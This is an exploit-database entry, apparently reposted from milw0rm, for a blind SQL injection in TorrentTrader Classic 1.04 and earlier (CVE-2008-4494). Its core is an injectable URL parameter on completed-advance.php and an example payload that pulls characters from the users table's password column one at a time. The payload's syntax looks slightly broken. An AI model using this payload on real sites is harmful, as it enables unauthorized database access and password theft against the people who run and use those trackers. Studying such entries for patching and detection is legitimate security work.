TorrentTrader Classic <= 1.04 - Blind SQL Injection Vulnerability

2008-10-07T00:00:00
ID EDB-ID:6698
Type exploitdb
Reporter BazOka-HaCkEr
Modified 2008-10-07T00:00:00

Description

TorrentTrader Classic. CVE-2008-4494. Webapps exploit for php platform

                                        
                                            ======================================================
 
==> TorrentTrader Classic <= 1.04 Blind SQL Injection Exploit
 
======================================================
 
==> NamE      : TorrentTrader Classic
 
==> version    : 1.04
 
==> Download : www.torrenttrader.org
 
======================================================
 
==> AuThOr : BazOka-HaCkEr
 
==> EmaiL   : x9j@HoTmaiL.Com
 
==> HomE   : WwW.TrYaG.cc/cc
 
======================================================
 
==> ExplO!te :
 
==> www.TarGeT.com/paTh/completed-advance.php?id=[SQL]
 
==> ExampLe :
 
==> www.TarGeT.com/tracker/completed-advance.php?id=180+AND ascii(SUBSTRING((SELECT Count(password) FROM users LIMIT 1,1)1,1)
 
======================================================
 
==> GreeTz :
 
==> ll Abu-Mahdi ll FeezO ll Mr.SQL ll MoGaTiL ll Abo-Najm ll alra7el ll
 
======================================================

# milw0rm.com [2008-10-07]